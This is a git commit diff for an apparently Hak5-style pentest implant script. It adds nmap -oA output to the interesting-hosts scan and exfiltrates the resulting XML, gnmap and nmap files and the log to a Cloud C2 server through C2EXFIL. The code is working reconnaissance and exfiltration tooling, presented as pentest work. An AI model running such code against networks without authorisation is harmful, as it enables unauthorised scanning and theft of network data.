Adding nmaps -oA option to interessting hosts scan (#48)
Adding the -oA option of nmap to export results in useful formats and upload them to the C2 Cloud. For further use in a pentest.pull/51/head
parent
5e6bbc86d3
commit
b4340761ba
|
@ -421,22 +421,24 @@ function GRAB_NMAP_LOOT() {
|
||||||
}
|
}
|
||||||
|
|
||||||
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
||||||
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
||||||
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
||||||
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
### Adding -oA nmap option to scan option
|
||||||
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-${SCAN_COUNT}-${TODAY}"
|
||||||
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
if [ "$GET_EXTERNAL_IP_ADDRESS" = "true" ]; then
|
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
||||||
INTERESTING_HOSTS+=( $(curl -s $PUBLIC_IP_URL) )
|
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
||||||
fi
|
if [ "$GET_EXTERNAL_IP_ADDRESS" = "true" ]; then
|
||||||
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
INTERESTING_HOSTS+=( $(curl -s $PUBLIC_IP_URL) )
|
||||||
echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\"" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
fi
|
||||||
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
echo >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\"" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
echo >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
fi
|
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
||||||
return
|
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
||||||
|
fi
|
||||||
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
function GRAB_DIG_LOOT() {
|
function GRAB_DIG_LOOT() {
|
||||||
|
@ -470,22 +472,49 @@ function GRAB_DIG_LOOT() {
|
||||||
# ****************************************************************************************************
|
# ****************************************************************************************************
|
||||||
|
|
||||||
function EXFIL_TO_CLOUD_C2() {
|
function EXFIL_TO_CLOUD_C2() {
|
||||||
if [ "$EXFIL_TO_CLOUD_C2" = "true" ]; then
|
if [ "$EXFIL_TO_CLOUD_C2" = "true" ]; then
|
||||||
if [[ $(pgrep cc-client) ]]; then
|
if [[ $(pgrep cc-client) ]]; then
|
||||||
LOOT_FILES="$LOOT_DIR/*.txt"
|
LOOT_FILES="$LOOT_DIR/*.txt"
|
||||||
for LOOT_FILE in $LOOT_FILES; do
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
done
|
done
|
||||||
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
### Add exfiltration of nmap -oA files
|
||||||
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
## XML
|
||||||
else
|
LOOT_FILES="$LOOT_DIR/*.xml"
|
||||||
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
||||||
fi
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
fi
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
return
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
|
||||||
|
## GNMAP
|
||||||
|
LOOT_FILES="$LOOT_DIR/*.gnmap"
|
||||||
|
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
|
||||||
|
## NMAP
|
||||||
|
LOOT_FILES="$LOOT_DIR/*.nmap"
|
||||||
|
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
|
||||||
|
### Exfiltrate log file
|
||||||
|
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
||||||
|
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
else
|
||||||
|
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
function EXFIL_TO_PASTEBIN() {
|
function EXFIL_TO_PASTEBIN() {
|
||||||
|
|
Loading…
Reference in New Issue